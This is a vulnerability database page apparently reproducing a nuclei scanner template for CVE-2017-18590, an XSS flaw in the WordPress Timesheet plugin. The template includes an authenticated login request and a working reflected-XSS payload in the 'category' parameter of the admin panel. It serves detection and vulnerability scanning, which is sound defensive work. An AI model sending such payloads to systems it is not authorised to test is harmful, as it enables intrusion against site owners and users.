Lucene search
K

Timesheet Plugin < 0.1.5 - Cross-Site Scripting

🗓️ 29 Jun 2026 05:52:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 20 Views

Timesheet Plugin < 0.1.5 - Cross-Site Scripting, Multiple XSS issue

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2017-18590
16 Nov 202421:58
circl
CNVD
WordPress timesheet plugin cross-site scripting vulnerability
29 Aug 201900:00
cnvd
CVE
CVE-2017-18590
27 Aug 201911:52
cve
Cvelist
CVE-2017-18590
27 Aug 201911:52
cvelist
EUVD
EUVD-2017-9703
7 Oct 202500:30
euvd
NVD
CVE-2017-18590
27 Aug 201912:15
nvd
OSV
CVE-2017-18590
27 Aug 201912:15
osv
Prion
Cross site scripting
27 Aug 201912:15
prion
RedhatCVE
CVE-2017-18590
9 Jan 202610:33
redhatcve
wpexploit
Multiple BestWebSoft Plugins - Authenticated Cross-Site Scripting (XSS)
12 Apr 201700:00
wpexploit
Rows per page
id: CVE-2017-18590

info:
  name: Timesheet Plugin < 0.1.5 - Cross-Site Scripting
  author: Splint3r7
  severity: medium
  description: |
    The Timesheet plugin before 0.1.5 for WordPress has multiple XSS issues.
  impact: |
    Authenticated attackers can execute arbitrary JavaScript in victims' browsers, potentially stealing session cookies, credentials, or performing actions on behalf of users.
  remediation: |
    Update to version 0.1.5 or later.
  reference:
    - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694/
    - https://nvd.nist.gov/vuln/detail/CVE-2017-18590
    - https://downloads.wordpress.org/plugin/timesheet
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2017-18590
    cwe-id: CWE-79
    epss-score: 0.01404
    epss-percentile: 0.69181
    cpe: cpe:2.3:a:bestwebsoft:promobar:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: bestwebsoft
    product: timesheet
    framework: wordpress
  tags: cve,cve2017,wordpress,wp,wp-plugin,bws-promobar,xss,authenticated,timesheet,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "/wp-content/plugins/timesheet")'
        internal: true

  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

      - |
        GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(header_2, "text/html")'
          - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")'
        condition: and
# digest: 4a0a0047304502207a337d7c94317882924c40346dac0591066721f41d8a20674bdade039cba5602022100cee69ff6b6d22b60bc0a49825a9b6553eb64b1b2acd9fd34704929e099a8cf39:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.4Medium risk
Vulners AI Score6.4
CVSS 24.3
CVSS 36.1
EPSS0.01404
20